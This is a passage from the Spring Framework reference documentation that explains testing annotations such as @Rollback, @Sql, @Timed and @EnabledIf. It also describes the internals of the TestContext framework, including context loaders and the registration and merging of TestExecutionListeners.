annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @Rollback\n`@Rollback` indicates whether the transaction for a transactional test method should be\n__rolled back__ after the test method has completed. If `true`, the transaction is rolled\nback; otherwise, the transaction is committed (see also `@Commit`). Rollback semantics\nfor integration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. When declared as a\nmethod-level annotation, `@Rollback` defines rollback semantics for the specific test\nmethod, potentially overriding class-level `@Rollback` or `@Commit` semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Rollback**(false)\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @BeforeTransaction\n`@BeforeTransaction` indicates that the annotated `void` method should be executed\n__before__ a transaction is started for test methods configured to run within a\ntransaction via Spring's `@Transactional` annotation. As of Spring Framework 4.3,\n`@BeforeTransaction` methods are not required to be `public` and may be declared on Java\n8 based interface default methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@BeforeTransaction**\n\tvoid beforeTransaction() {\n\t\t\/\/ logic to be executed before a transaction is started\n\t}\n----\n\n===== @AfterTransaction\n`@AfterTransaction` indicates that the annotated `void` method should be executed\n__after__ a transaction is ended for test methods configured to run within a transaction\nvia Spring's `@Transactional` annotation. As of Spring Framework 4.3, `@AfterTransaction`\nmethods are not required to be `public` and may be declared on Java 8 based interface\ndefault methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@AfterTransaction**\n\tvoid afterTransaction() {\n\t\t\/\/ logic to be executed after a transaction has ended\n\t}\n----\n\n===== @Sql\n`@Sql` is used to annotate a test class or test method to configure SQL scripts to be\nexecuted against a given database during integration tests.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test schema and test data\n\t}\n----\n\nSee <<testcontext-executing-sql-declaratively>> for further details.\n\n===== @SqlConfig\n`@SqlConfig` defines metadata that is used to determine how to parse and execute SQL\nscripts configured via the `@Sql` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"\/test-user-data.sql\",\n\t\tconfig = **@SqlConfig**(commentPrefix = \"`\", separator = \"@@\")\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test data\n\t}\n----\n\n===== @SqlGroup\n`@SqlGroup` is a container annotation that aggregates several `@Sql` annotations.\n`@SqlGroup` can be used natively, declaring several nested `@Sql` annotations, or it can\nbe used in conjunction with Java 8's support for repeatable annotations, where `@Sql` can\nsimply be declared several times on the same class or method, implicitly generating this\ncontainer annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@SqlGroup**({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n\n[[integration-testing-annotations-standard]]\n==== Standard Annotation Support\nThe following annotations are supported with standard semantics for all configurations\nof the Spring TestContext Framework. Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@ManagedBean` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit Jupiter's `@BeforeEach`), and that will apply for every test method\nin the test class. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit4]]\n==== Spring JUnit 4 Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, <<testcontext-junit4-rules,Spring's JUnit\n4 rules>>, or <<testcontext-support-classes-junit4,Spring's JUnit 4 support classes>>.\n\n===== @IfProfileValue\n`@IfProfileValue` indicates that the annotated test is enabled for a specific testing\nenvironment. If the configured `ProfileValueSource` returns a matching `value` for the\nprovided `name`, the test is enabled. Otherwise, the test will be disabled and\neffectively _ignored_.\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. This is analogous to the\nsemantics of JUnit 4's `@Ignore` annotation, except that the presence of `@Ignore` always\ndisables a test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"java.vendor\", **value**=\"Oracle Corporation\")\n\t@Test\n\tpublic void testProcessWhichRunsOnlyOnOracleJvm() {\n\t\t\/\/ some logic that should run only on Java VMs from Oracle Corporation\n\t}\n----\n\nAlternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__\nsemantics) to achieve TestNG-like support for __test groups__ in a JUnit 4 environment.\nConsider the following example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"test-groups\", **values**={\"unit-tests\", \"integration-tests\"})\n\t@Test\n\tpublic void testProcessWhichRunsForUnitOrIntegrationTestGroups() {\n\t\t\/\/ some logic that should run only for unit and integration test groups\n\t}\n----\n\n===== @ProfileValueSourceConfiguration\n`@ProfileValueSourceConfiguration` is a class-level annotation that specifies what type\nof `ProfileValueSource` to use when retrieving __profile values__ configured through the\n`@IfProfileValue` annotation. If `@ProfileValueSourceConfiguration` is not declared for a\ntest, `SystemProfileValueSource` is used by default.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)\n\tpublic class CustomProfileValueSourceTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @Timed\n`@Timed` indicates that the annotated test method must finish execution in a specified\ntime period (in milliseconds). If the text execution time exceeds the specified time\nperiod, the test fails.\n\nThe time period includes execution of the test method itself, any repetitions of the\ntest (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Timed**(millis=1000)\n\tpublic void testProcessWithOneSecondTimeout() {\n\t\t\/\/ some logic that should not take longer than 1 second to execute\n\t}\n----\n\nSpring's `@Timed` annotation has different semantics than JUnit 4's `@Test(timeout=...)`\nsupport. Specifically, due to the manner in which JUnit 4 handles test execution timeouts\n(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`\npreemptively fails the test if the test takes too long. Spring's `@Timed`, on the other\nhand, does not preemptively fail the test but rather waits for the test to complete\nbefore failing.\n\n===== @Repeat\n`@Repeat` indicates that the annotated test method must be executed repeatedly. The\nnumber of times that the test method is to be executed is specified in the annotation.\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n[[integration-testing-annotations-junit-jupiter]]\n==== Spring JUnit Jupiter Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit-jupiter-extension,`SpringExtension`>> and JUnit Jupiter (i.e., the\nprogramming model in JUnit 5).\n\n===== @SpringJUnitConfig\n\n`@SpringJUnitConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` from\nthe Spring TestContext Framework. It can be used at the class level as a drop-in\nreplacement for `@ContextConfiguration`. With regard to configuration options, the only\ndifference between `@ContextConfiguration` and `@SpringJUnitConfig` is that annotated\nclasses may be declared via the `value` attribute in `@SpringJUnitConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitConfig` and\n`@ContextConfiguration` for further details.\n\n===== @SpringJUnitWebConfig\n\n`@SpringJUnitWebConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` and\n`@WebAppConfiguration` from the Spring TestContext Framework. It can be used at the class\nlevel as a drop-in replacement for `@ContextConfiguration` and `@WebAppConfiguration`.\nWith regard to configuration options, the only difference between `@ContextConfiguration`\nand `@SpringJUnitWebConfig` is that annotated classes may be declared via the `value`\nattribute in `@SpringJUnitWebConfig`. In addition, the `value` attribute from\n`@WebAppConfiguration` can only be overridden via the `resourcePath` attribute in\n`@SpringJUnitWebConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitWebConfig`,\n`@ContextConfiguration`, and `@WebAppConfiguration` for further details.\n\n===== @EnabledIf\n\n`@EnabledIf` is used to signal that the annotated JUnit Jupiter test class or test method\nis _enabled_ and should be executed if the supplied `expression` evaluates to `true`.\nSpecifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal to\n`\"true\"` (ignoring case), the test will be __enabled__. When applied at the class level,\nall test methods within that class are automatically enabled by default as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@EnabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@EnabledIf(\"${smoke.tests.enabled}\")`\n* Text literal \u2013 for example:\n - `@EnabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@EnabledIf(\"false\")` is equivalent\nto `@Disabled` and `@EnabledIf(\"true\")` is logically meaningless.\n\n`@EnabledIf` may be used as a meta-annotation to create custom composed annotations. For\nexample, a custom `@EnabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@EnabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Enabled on Mac OS\"\n)\npublic @interface EnabledOnMac {}\n----\n\n===== @DisabledIf\n\n`@DisabledIf` is used to signal that the annotated JUnit Jupiter test class or test\nmethod is _disabled_ and should not be executed if the supplied `expression` evaluates to\n`true`. Specifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal\nto `\"true\"` (ignoring case), the test will be __disabled__. When applied at the class\nlevel, all test methods within that class are automatically disabled as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@DisabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@DisabledIf(\"${smoke.tests.disabled}\")`\n* Text literal \u2013 for example:\n - `@DisabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@DisabledIf(\"true\")` is\nequivalent to `@Disabled` and `@DisabledIf(\"false\")` is logically meaningless.\n\n`@DisabledIf` may be used as a meta-annotation to create custom composed annotations. For\nexample, a custom `@DisabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@DisabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Disabled on Mac OS\"\n)\npublic @interface DisabledOnMac {}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nIt is possible to use most test-related annotations as\n<<core.adoc#beans-meta-annotations,meta-annotations>> in order to create custom _composed\nannotations_ and reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@BootstrapWith`\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat` _(only supported on JUnit 4)_\n* `@Timed` _(only supported on JUnit 4)_\n* `@IfProfileValue` _(only supported on JUnit 4)_\n* `@ProfileValueSourceConfiguration` _(only supported on JUnit 4)_\n* `@SpringJUnitConfig` _(only supported on JUnit Jupiter)_\n* `@SpringJUnitWebConfig` _(only supported on JUnit Jupiter)_\n* `@EnabledIf` _(only supported on JUnit Jupiter)_\n* `@DisabledIf` _(only supported on JUnit Jupiter)_\n\nFor example, if we discover that we are repeating the following configuration across our\n_JUnit 4_ based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_ that\ncentralizes the common test configuration for Spring like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTestConfig { }\n----\n\nThen we can use our custom `@TransactionalDevTestConfig` annotation to simplify the\nconfiguration of individual JUnit 4 based test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class UserRepositoryTests { }\n----\n\nIf we are writing tests using JUnit Jupiter, we can reduce code duplication even further\nsince annotations in JUnit 5 can also be used as meta-annotations. For example, if we\ndiscover that we are repeating the following configuration across our JUnit Jupiter based\ntest suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ExtendWith(SpringExtension.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tclass OrderRepositoryTests { }\n\n\t@ExtendWith(SpringExtension.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tclass UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_\nthat centralizes the common test configuration for Spring and JUnit Jupiter like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ExtendWith(SpringExtension.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTestConfig { }\n----\n\nThen we can use our custom `@TransactionalDevTestConfig` annotation to simplify the\nconfiguration of individual JUnit Jupiter based test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TransactionalDevTestConfig\n\tclass OrderRepositoryTests { }\n\n\t@TransactionalDevTestConfig\n\tclass UserRepositoryTests { }\n----\n\nSince JUnit Jupiter supports the use of `@Test`, `@RepeatedTest`, `ParameterizedTest`,\netc. as meta-annotations, it is also possible to create custom composed annotations at\nthe test method level. For example, if we wish to create a _composed annotation_ that\ncombines the `@Test` and `@Tag` annotations from JUnit Jupiter with the `@Transactional`\nannotation from Spring, we could create an `@TransactionalIntegrationTest` annotation as\nfollows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.METHOD)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Transactional\n\t@Tag(\"integration-test\") \/\/ org.junit.jupiter.api.Tag\n\t@Test \/\/ org.junit.jupiter.api.Test\n\tpublic @interface TransactionalIntegrationTest { }\n----\n\nThen we can use our custom `@TransactionalIntegrationTest` annotation to simplify the\nconfiguration of individual JUnit Jupiter based test methods as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TransactionalIntegrationTest\n\tvoid saveOrder() { }\n\n\t@TransactionalIntegrationTest\n\tvoid deleteOrder() { }\n----\n\nFor further details, consult the <<core.adoc#annotation-programming-model,Spring\nAnnotation Programming Model>>.\n\n\n[[testcontext-framework]]\n=== Spring TestContext Framework\nThe __Spring TestContext Framework__ (located in the\n`org.springframework.test.context` package) provides generic, annotation-driven unit and\nintegration testing support that is agnostic of the testing framework in use. The\nTestContext framework also places a great deal of importance on __convention over\nconfiguration__ with reasonable defaults that can be overridden through annotation-based\nconfiguration.\n\nIn addition to generic testing infrastructure, the TestContext framework provides\nexplicit support for JUnit 4, JUnit Jupiter (a.k.a., JUnit 5), and TestNG. For JUnit 4\nand TestNG, Spring provides `abstract` support classes. Furthermore, Spring provides a\ncustom JUnit `Runner` and custom JUnit `Rules` for _JUnit 4_ as well as a custom\n`Extension` for _JUnit Jupiter_ that allow one to write so-called __POJO test classes__.\nPOJO test classes are not required to extend a particular class hierarchy such as the\n`abstract` support classes.\n\nThe following section provides an overview of the internals of the TestContext framework.\nIf you are only interested in _using_ the framework and not necessarily interested in\n_extending_ it with your own custom listeners or custom loaders, feel free to go directly\nto the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContextManager` class and the\n`TestContext`, `TestExecutionListener`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created per test class (e.g., for the execution of all test\nmethods within a single test class in JUnit Jupiter). The `TestContextManager` in turn\nmanages a `TestContext` that holds the context of the current test. The\n`TestContextManager` also updates the state of the `TestContext` as the test progresses\nand delegates to `TestExecutionListener` implementations, which instrument the actual\ntest execution by providing dependency injection, managing transactions, and so on. A\n`SmartContextLoader` is responsible for loading an `ApplicationContext` for a given test\nclass. Consult the javadocs and the Spring test suite for further information and\nexamples of various implementations.\n\n===== TestContext\n`TestContext` encapsulates the context in which a test is executed, agnostic of the\nactual testing framework in use, and provides context management and caching support for\nthe test instance for which it is responsible. The `TestContext` also delegates to a\n`SmartContextLoader` to load an `ApplicationContext` if requested.\n\n===== TestContextManager\n`TestContextManager` is the main entry point into the __Spring TestContext Framework__\nand is responsible for managing a single `TestContext` and signaling events to each\nregistered `TestExecutionListener` at well-defined test execution points:\n\n* prior to any __before class__ or __before all__ methods of a particular testing framework\n* test instance post-processing\n* prior to any __before__ or __before each__ methods of a particular testing framework\n* immediately before execution of the test method but after test setup\n* immediately after execution of the test method but before test tear down\n* after any __after__ or __after each__ methods of a particular testing framework\n* after any __after class__ or __after all__ methods of a particular testing framework\n\n===== TestExecutionListener\n`TestExecutionListener` defines the API for reacting to test execution events published\nby the `TestContextManager` with which the listener is registered. See\n<<testcontext-tel-config>>.\n\n===== Context Loaders\n`ContextLoader` is a strategy interface that was introduced in Spring 2.5 for loading an\n`ApplicationContext` for an integration test managed by the Spring TestContext Framework.\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and `WebApplicationContext` support.\n\n`SmartContextLoader` is an extension of the `ContextLoader` interface introduced in\nSpring 3.1. The `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was\nintroduced in Spring 2.5. Specifically, a `SmartContextLoader` can choose to process\nresource `locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\nSpring provides the following implementations:\n\n* `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n* `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n* `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n* `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n* `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n* `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n* `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\n[[testcontext-bootstrapping]]\n==== Bootstrapping the TestContext framework\n\nThe default configuration for the internals of the Spring TestContext Framework is\nsufficient for all common use cases. However, there are times when a development team or\nthird party framework would like to change the default `ContextLoader`, implement a\ncustom `TestContext` or `ContextCache`, augment the default sets of\n`ContextCustomizerFactory` and `TestExecutionListener` implementations, etc. For such low\nlevel control over how the TestContext framework operates, Spring provides a\nbootstrapping strategy.\n\n`TestContextBootstrapper` defines the SPI for _bootstrapping_ the TestContext framework.\nA `TestContextBootstrapper` is used by the `TestContextManager` to load the\n`TestExecutionListener` implementations for the current test and to build the\n`TestContext` that it manages. A custom bootstrapping strategy can be configured for a\ntest class (or test class hierarchy) via `@BootstrapWith`, either directly or as a\nmeta-annotation. If a bootstrapper is not explicitly configured via `@BootstrapWith`,\neither the `DefaultTestContextBootstrapper` or the `WebTestContextBootstrapper` will be\nused, depending on the presence of `@WebAppConfiguration`.\n\nSince the `TestContextBootstrapper` SPI is likely to change in the future in order to\naccommodate new requirements, implementers are strongly encouraged not to implement this\ninterface directly but rather to extend `AbstractTestContextBootstrapper` or one of its\nconcrete subclasses instead.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ``TestExecutionListener``s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ``TestExecutionListener``s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. Since Spring\nFramework 4.1, this issue is addressed via support for automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n``TestExecutionListener``s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. Third-party frameworks and developers can\ncontribute their own ``TestExecutionListener``s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ``TestExecutionListener``s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n``TestExecutionListener``s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ``TestExecutionListener``s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ``TestExecutionListener``s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1, and `DirtiesContextBeforeModesTestExecutionListener`\nwas introduced in Spring Framework 4.2. Furthermore, third-party frameworks like Spring\nSecurity register their own default ``TestExecutionListener``s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class 